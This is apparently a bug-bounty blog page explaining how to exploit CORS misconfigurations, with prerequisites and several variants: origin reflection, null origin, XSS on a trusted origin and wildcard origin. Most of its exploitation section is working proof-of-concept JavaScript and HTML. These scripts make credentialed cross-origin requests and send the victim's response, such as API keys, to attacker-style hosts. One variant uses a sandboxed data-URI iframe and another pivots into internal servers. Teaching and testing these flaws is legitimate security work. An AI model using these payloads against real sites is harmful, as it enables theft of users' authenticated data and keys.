Ender's Blogs
Search…
CORS
A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials.

Summary

  • Prerequisites
  • Exploitation
  • References

Prerequisites

  • BURP HEADER (Request) > Origin: https://evil.com
  • VICTIM HEADER (Response) > Access-Control-Allow-Credential: true
  • VICTIM HEADER (Response) > Access-Control-Allow-Origin: https://evil.com OR Access-Control-Allow-Origin: null
  • BURP HEADER (Request) > Origin: Null AND the Response Access-Control-Allow-Origin: null
We should check manually, do not just rely on the origin request header.

Exploitation

Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target https://victim.example.com/endpoint.

Vulnerable Example: Origin Reflection

Vulnerable Implementation
1
GET /endpoint HTTP/1.1
2
Host: victim.example.com
3
Origin: https://evil.com
4
Cookie: sessionid=...
5
6
HTTP/1.1 200 OK
7
Access-Control-Allow-Origin: https://evil.com
8
Access-Control-Allow-Credentials: true
9
10
{"[private API key]"}
Copied!
Proof of concept
1
var req = new XMLHttpRequest();
2
req.onload = reqListener;
3
req.open('get','https://victim.example.com/endpoint',true);
4
req.withCredentials = true;
5
req.send();
6
7
function reqListener() {
8
location='//atttacker.net/log?key='+this.responseText;
9
};
Copied!
or
1
<html>
2
<body>
3
<h2>CORS PoC</h2>
4
<div id="demo">
5
<button type="button" onclick="cors()">Exploit</button>
6
</div>
7
<script>
8
function cors() {
9
var xhr = new XMLHttpRequest();
10
xhr.onreadystatechange = function() {
11
if (this.readyState == 4 && this.status == 200) {
12
document.getElementById("demo").innerHTML = alert(this.responseText);
13
}
14
};
15
xhr.open("GET",
16
"https://victim.example.com/endpoint", true);
17
xhr.withCredentials = true;
18
xhr.send();
19
}
20
</script>
21
</body>
22
</html>
Copied!
Standard CORS requests do not send or set any cookies by default. In order to include cookies as part of the request, you need to set the XMLHttpRequest’s .withCredentials property to true

Vulnerable Example: Null Origin

Vulnerable Implementation
It's possible that the server does not reflect the complete Origin header but that the null origin is allowed. This would look like this in the server's response:
1
GET /endpoint HTTP/1.1
2
Host: victim.example.com
3
Origin: null
4
Cookie: sessionid=...
5
6
HTTP/1.1 200 OK
7
Access-Control-Allow-Origin: null
8
Access-Control-Allow-Credentials: true
9
10
{"[private API key]"}
Copied!
Proof of concept
This can be exploited by putting the attack code into an iframe using the data URI scheme. If the data URI scheme is used, the browser will use the null origin in the request:
1
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
2
var req = new XMLHttpRequest ();
3
req.onload = reqListener;
4
req.open('get','https://victim.example.com/endpoint',true);
5
req.withCredentials = true;
6
req.send();
7
8
function reqListener() {
9
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
10
};
11
</script>"></iframe>
Copied!

Vulnerable Example: XSS on Trusted Origin

If the application does implement a strict whitelist of allowed origins, the exploit codes from above do not work. But if you have an XSS on a trusted origin, you can inject the exploit coded from above in order to exploit CORS again.
1
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
Copied!
Sometimes, the payloads does not pop up via XSS. You should also get the response from the console.
1
https://trusted-origin.example.com/?xss=<script>var req = new XMLHttpRequest(); req.open('get','https://acb01fc81f8f9958806a0dee004900a5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();</script>
Copied!
Go to the Console and ask for: req.response

Vulnerable Example: Wildcard Origin * without Credentials

If the server responds with a wildcard origin *, the browser does never send the cookies. However, if the server does not require authentication, it's still possible to access the data on the server. This can happen on internal servers that are not accessible from the Internet. The attacker's website can then pivot into the internal network and access the server's data withotu authentication.
Vulnerable Implementation
1
GET /endpoint HTTP/1.1
2
Host: api.internal.example.com
3
Origin: https://evil.com
4
5
HTTP/1.1 200 OK
6
Access-Control-Allow-Origin: *
7
8
{"[private API key]"}
Copied!
Proof of concept
1
var req = new XMLHttpRequest();
2
req.onload = reqListener;
3
req.open('get','https://api.internal.example.com/endpoint',true);
4
req.send();
5
6
function reqListener() {
7
location='//atttacker.net/log?key='+this.responseText;
8
};
Copied!

Bug Bounty reports

References

Last modified 1yr ago